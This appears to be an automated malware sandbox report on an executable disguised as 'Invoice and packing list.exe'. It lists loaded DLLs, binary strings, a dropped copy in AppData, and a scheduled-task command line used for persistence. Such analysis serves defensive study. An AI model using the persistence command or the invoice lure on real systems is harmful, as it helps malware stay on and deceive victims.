Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Section loaded: snmpapi.dll
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Section loaded: wininet.dll

Source: C:\Users\user\Desktop\Invoice and packing list.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Invoice and packing list.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Invoice and packing list.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Invoice and packing list.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Invoice and packing list.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: FYSY.pdb source: Invoice and packing list.exe, utlAHqvw.exe.0.dr
Source:	Binary string: netstat.pdbGCTL source: MSBuild.exe, 0000000F.00000002.2110659682.00000000010A8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.2112598055.0000000001500000.00000040.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 00000010.00000002.4482049014.0000000000D90000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: netstat.pdb source: MSBuild.exe, 0000000F.00000002.2110659682.00000000010A8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.2112598055.0000000001500000.00000040.10000000.00040000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000010.00000002.4482049014.0000000000D90000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: FYSY.pdbSHA256 source: Invoice and packing list.exe, utlAHqvw.exe.0.dr
Source:	Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: explorer.exe, 0000000A.00000002.4504694781.0000000010DBF000.00000004.80000000.00040000.00000000.sdmp, NETSTAT.EXE, 00000010.00000002.4482370296.0000000003341000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000010.00000002.4483360184.0000000003D9F000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: MSBuild.exe, 0000000F.00000002.2112877198.0000000001510000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000010.00000002.4482891825.0000000003850000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000010.00000003.2111475683.00000000036A8000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000010.00000002.4482891825.00000000039EE000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000010.00000003.2108937259.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.2119670913.0000000004444000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.2123724551.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.2123724551.000000000493E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.2121528110.00000000045F5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rundll32.pdb source: MSBuild.exe, 00000009.00000002.2120256075.0000000001860000.00000040.10000000.00040000.00000000.sdmp, MSBuild.exe, 00000009.00000002.2119665265.0000000001428000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.2123315580.0000000000650000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: MSBuild.exe, MSBuild.exe, 0000000F.00000002.2112877198.0000000001510000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000010.00000002.4482891825.0000000003850000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000010.00000003.2111475683.00000000036A8000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000010.00000002.4482891825.00000000039EE000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000010.00000003.2108937259.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.2119670913.0000000004444000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.2123724551.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.2123724551.000000000493E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.2121528110.00000000045F5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rundll32.pdbGCTL source: MSBuild.exe, 00000009.00000002.2120256075.0000000001860000.00000040.10000000.00040000.00000000.sdmp, MSBuild.exe, 00000009.00000002.2119665265.0000000001428000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.2123315580.0000000000650000.00000040.80000000.00040000.00000000.sdmp

Source: Invoice and packing list.exe

Static PE information: 0xE0FECAF2 [Sat Aug 13 18:01:22 2089 UTC]

Source: C:\Users\user\Desktop\Invoice and packing list.exe	Code function: 0_2_00E0DA70 push eax; retf	0_2_00E0DA71
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Code function: 0_2_051DD710 push esp; retf	0_2_051DD711
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Code function: 0_2_071A7149 push esi; iretd	0_2_071A714A
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Code function: 0_2_071A7161 push esi; iretd	0_2_071A7162
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B09AD push ecx; mov dword ptr [esp], ecx	9_2_018B09B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01881368 push eax; iretd	9_2_01881369
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01881FEC push eax; iretd	9_2_01881FED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01907E99 push ecx; ret	9_2_01907EAC
Source: C:\Windows\explorer.exe	Code function: 10_2_0F53EB1E push esp; retn 0000h	10_2_0F53EB1F
Source: C:\Windows\explorer.exe	Code function: 10_2_0F53EB02 push esp; retn 0000h	10_2_0F53EB03
Source: C:\Windows\explorer.exe	Code function: 10_2_0F53E9B5 push esp; retn 0000h	10_2_0F53EAE7
Source: C:\Windows\explorer.exe	Code function: 10_2_0F7BEB1E push esp; retn 0000h	10_2_0F7BEB1F
Source: C:\Windows\explorer.exe	Code function: 10_2_0F7BEB02 push esp; retn 0000h	10_2_0F7BEB03
Source: C:\Windows\explorer.exe	Code function: 10_2_0F7BE9B5 push esp; retn 0000h	10_2_0F7BEAE7
Source: C:\Windows\explorer.exe	Code function: 10_2_0F9149B5 push esp; retn 0000h	10_2_0F914AE7
Source: C:\Windows\explorer.exe	Code function: 10_2_0F914B1E push esp; retn 0000h	10_2_0F914B1F
Source: C:\Windows\explorer.exe	Code function: 10_2_0F914B02 push esp; retn 0000h	10_2_0F914B03
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Code function: 11_2_0130DA70 push eax; retf	11_2_0130DA71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0041E1FC pushfd ; retf	15_2_0041E1FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_004172AE push ebp; retf	15_2_004172B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0041D475 push eax; ret	15_2_0041D4C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0041D4C2 push eax; ret	15_2_0041D4C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0041D4CB push eax; ret	15_2_0041D532
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0041D52C push eax; ret	15_2_0041D532
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_0041D580 push edx; ret	15_2_0041D957
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_015409AD push ecx; mov dword ptr [esp], ecx	15_2_015409B6
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_00D960DD push ecx; ret	16_2_00D960F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_0385225F pushad ; ret	16_2_038527F9
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038527FA pushad ; ret	16_2_038527F9
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_038809AD push ecx; mov dword ptr [esp], ecx	16_2_038809B6
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_0385283D push eax; iretd	16_2_03852858

Source: Invoice and packing list.exe	Static PE information: section name: .text entropy: 7.7343315991965556
Source: utlAHqvw.exe.0.dr	Static PE information: section name: .text entropy: 7.7343315991965556

Source: C:\Users\user\Desktop\Invoice and packing list.exe

File created: C:\Users\user\AppData\Roaming\utlAHqvw.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\Invoice and packing list.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\utlAHqvw" /XML "C:\Users\user\AppData\Local\Temp\tmp2498.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
